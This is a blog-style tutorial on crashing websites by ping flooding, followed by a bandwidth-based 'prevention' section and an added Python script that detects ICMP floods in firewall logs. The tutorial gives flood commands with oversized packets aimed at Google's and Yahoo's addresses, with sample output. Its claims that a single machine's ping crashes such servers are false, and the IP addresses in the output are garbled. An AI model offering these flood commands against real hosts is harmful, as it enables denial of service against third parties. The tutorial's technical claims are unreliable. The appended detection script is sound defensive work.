First I will say this: do not do this to anyone's website or server except your own. This can get you prison time. This is for educational purposes. I will show you how to crash a website, then I will show you how to prevent such attacks.
The most common way to crash a website is by sending massive amounts of data to the server it is hosted on. This means that instead of crashing a single site you may crash multiple sites. It all depends on how many websites are hosted on the server at that particular IP address.
I wrote in previous blogs how to set up a server to host a website, and how to set up a server to host multiple websites. Both blogs show you how to set up a server with a single IP address. I recommend reading those blogs and setting up your own server so you can try the attack I'm going to demonstrate in this blog.
First of all, no matter what computer you're using and no matter what operating system you have, you should already have the tools you need. These tools are listed below.
- Any tool to find an IP Address of a website (Ping, Whois)
Now that you know the only two things you will need, let's get started. I will first show you how to achieve this in Windows.
In Windows you simply fire up the command prompt. There are several ways to do this, but I will tell you the most universal way: search for CMD, or in older versions of Windows open the Run dialog and type CMD.
This should open your command prompt window, which lets you type DOS commands. Now we need the IP address of a website. Ping can do this, or a whois website. So let's use ping to obtain the IP address of, say, Google. To do this we type the following into our command prompt.
After typing the above command and pressing Enter, you should get the following result.
Pinging google.com [220.127.116.11] with 32 bytes of data:
Reply from 18.104.22.168: bytes=32 time=56ms TTL=127
Reply from 22.214.171.124: bytes=32 time=25ms TTL=127
Reply from 126.96.36.199: bytes=32 time=27ms TTL=127
Reply from 188.8.131.52: bytes=32 time=47ms TTL=127
Ping statistics for 184.108.40.206:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 25ms, Maximum = 56ms, Average = 38ms
Great, so now we know that Google's IP address is 220.127.116.11. But of course, who didn't already know Google's IP address?
Now we will use ping once again, but this time we will ping the IP address. So we type the following.
ping 18.104.22.168 -t -l 65500
The above command produces a continuous output like the following.
Pinging 22.214.171.124 with 65500 bytes of data:
Request timed out.
Request timed out.
It will continue to do this until the site crashes.
So what exactly did we do?
Well, ping is a tool that sends packets of data from your computer to another computer. In our case the computer we are pinging is Google's server.
Just typing the word ping followed by Enter in the Windows command line outputs the following.
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] target_name
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
The above is the usage text for ping. We used the -t switch and the -l switch in our earlier command. As the list above shows, what we did was tell ping to keep sending data to a certain computer until the computer we are sending data to stops accepting it. That is why we used the -t switch. We also used the -l switch; looking at our switch list we can see that -l lets us choose the size of the data packet we send.
In my example I used -l 65500 because that was the largest value I could use on my test machine. If you have more bandwidth, you would use the biggest number you can.
In short, we flooded Google's servers with so much data that they ended up crashing. Of course, we have to hope that the server we are attacking has less bandwidth than we do, or else we will end up crashing ourselves.
Now let's do the same thing on a Unix system.
On a Unix system we first need the -c switch, which is the count switch. We use it because the default ping tool on Unix systems will keep pinging indefinitely if we don't tell it when to stop. So we type the following into the terminal.
ping -c 4 yahoo.com
The above outputs the following.
PING yahoo.com (126.96.36.199) 56(84) bytes of data.
64 bytes from ir2.fp.vip.bf1.yahoo.com (188.8.131.52): icmp_req=1 ttl=48 time=231 ms
64 bytes from ir2.fp.vip.bf1.yahoo.com (184.108.40.206): icmp_req=2 ttl=48 time=71.1 ms
64 bytes from ir2.fp.vip.bf1.yahoo.com (220.127.116.11): icmp_req=3 ttl=49 time=60.7 ms
64 bytes from ir2.fp.vip.bf1.yahoo.com (18.104.22.168): icmp_req=4 ttl=49 time=67.0 ms
--- yahoo.com ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 60.764/107.642/231.599/71.661 ms
So now we see that we sent 64 bytes of data to yahoo.com 4 times. We also see that the IP address of the Yahoo domain name is 22.214.171.124. So we now run the following.
ping -s 65500 126.96.36.199
The above keeps producing output until the target computer has shut down. The output looks like the following.
PING 188.8.131.52 (184.108.40.206) 65500(65528) bytes of data.
65508 bytes from 220.127.116.11: icmp_req=1 ttl=53 time=389 ms
65508 bytes from 18.104.22.168: icmp_req=2 ttl=53 time=390 ms
65508 bytes from 22.214.171.124: icmp_req=3 ttl=53 time=405 ms
65508 bytes from 126.96.36.199: icmp_req=4 ttl=53 time=350 ms
65508 bytes from 188.8.131.52: icmp_req=5 ttl=53 time=370 ms
65508 bytes from 184.108.40.206: icmp_req=6 ttl=53 time=387 ms
65508 bytes from 220.127.116.11: icmp_req=7 ttl=53 time=379 ms
65508 bytes from 18.104.22.168: icmp_req=8 ttl=53 time=389 ms
65508 bytes from 22.214.171.124: icmp_req=9 ttl=53 time=367 ms
65508 bytes from 126.96.36.199: icmp_req=10 ttl=53 time=385 ms
65508 bytes from 188.8.131.52: icmp_req=11 ttl=53 time=362 ms
Preventing The Attack
So how do we protect our servers from such an attack? Well, it's extremely simple. However, for hobbyists who don't have a lot of money and who get their internet access through a consumer ISP, it can be rather pricey. What we need to do is give our servers more bandwidth than an average computer user would have. Either way, you can never have too much bandwidth: the more bandwidth you have, the faster your site will be on the web, and it gives you more of a cushion against attacks like the one I showed you in this blog. Getting more bandwidth is the common method that all major companies use to protect against such attacks. So in theory, if you have more bandwidth than your victim has, you will still be able to attack your victim.
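Bandwidth is the blog's one defence; an administrator also wants to notice a ping flood when it starts, before the link saturates. As an added, defensive example that is not part of the original post, the Python script below scans firewall log lines for ICMP echo requests (TYPE=8) and raises an alert when one source sends more than a threshold number of requests inside a sliding window, or sends an echo request larger than an Ethernet MTU (the `-l 65500` / `-s 65500` packets shown above arrive as IP datagrams of 65528 bytes). The log lines, the source addresses, the hostname `gw` and the `ICMP-IN:` log prefix are all constructed for this example; the field layout follows the iptables LOG target, but the thresholds are assumptions to tune for your own traffic.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Fields we need from an iptables-style LOG line (the format is assumed here).
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d{2}:\d{2}:\d{2}).*?"
    r"SRC=(?P<src>[\d.]+)\s+DST=(?P<dst>[\d.]+)\s+LEN=(?P<len>\d+).*?"
    r"PROTO=ICMP\s+TYPE=(?P<type>\d+)"
)

WINDOW_SECONDS = 10            # sliding window per source address (assumed value)
MAX_REQUESTS_PER_WINDOW = 20   # more echo requests than this in the window -> flood (assumed value)
MAX_LEN = 1500                 # an echo request bigger than an Ethernet MTU is suspicious (assumed value)


def parse_line(line, year=2024):
    """Return the timestamp, addresses, length and ICMP type of an ICMP log line, or None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "src": m.group("src"), "dst": m.group("dst"),
            "len": int(m.group("len")), "type": int(m.group("type"))}


def detect_icmp_flood(lines):
    """Scan log lines in order and return one alert string per (reason, source) pair."""
    alerts = []
    windows = defaultdict(deque)   # source -> timestamps of recent echo requests
    flagged = set()                # (reason, source) pairs already reported
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["type"] != 8:   # only ICMP echo requests count
            continue
        src = rec["src"]
        if rec["len"] > MAX_LEN and ("oversized", src) not in flagged:
            flagged.add(("oversized", src))
            alerts.append(f"oversized echo request from {src}: LEN={rec['len']}")
        q = windows[src]
        q.append(rec["ts"])
        # Drop timestamps that have fallen out of the window; the newest entry always stays.
        while (rec["ts"] - q[0]).total_seconds() > WINDOW_SECONDS:
            q.popleft()
        if len(q) > MAX_REQUESTS_PER_WINDOW and ("rate", src) not in flagged:
            flagged.add(("rate", src))
            alerts.append(f"echo request flood from {src}: {len(q)} requests in {WINDOW_SECONDS}s")
    return alerts


def _log_line(ts, src, dst, length, icmp_type):
    # Constructed log line in the shape the netfilter LOG target writes.
    return (f"{ts.strftime('%b %d %H:%M:%S')} gw kernel: ICMP-IN: IN=eth0 OUT= "
            f"SRC={src} DST={dst} LEN={length} TOS=0x00 PREC=0x00 TTL=53 ID=0 DF "
            f"PROTO=ICMP TYPE={icmp_type} CODE=0 ID=1 SEQ=1")


# Constructed sample: a normal "ping -c 4" from 192.0.2.5, one echo reply, one unrelated
# line, then 30 oversized echo requests from 198.51.100.7 within three seconds.
_T0 = datetime(2024, 1, 12, 10, 0, 0)
SAMPLE_LOG = (
    [_log_line(_T0 + timedelta(seconds=3 * i), "192.0.2.5", "203.0.113.10", 84, 8) for i in range(4)]
    + [_log_line(_T0 + timedelta(seconds=2), "203.0.113.10", "192.0.2.5", 84, 0)]
    + ["Jan 12 10:00:02 gw sshd[123]: Accepted publickey for ops from 192.0.2.5"]
    + [_log_line(_T0 + timedelta(milliseconds=100 * i), "198.51.100.7", "203.0.113.10", 65528, 8)
       for i in range(30)]
)

if __name__ == "__main__":
    for alert in detect_icmp_flood(SAMPLE_LOG):
        print(alert)
```

Run against the constructed sample it reports the oversized request from 198.51.100.7 and then the rate alert once that source crosses 21 requests inside the window, while the four-packet ping from 192.0.2.5 stays quiet. The same signal can be acted on at the firewall: iptables' `limit` match can cap accepted echo requests per second so a single flooding host does not consume the link the blog recommends buying.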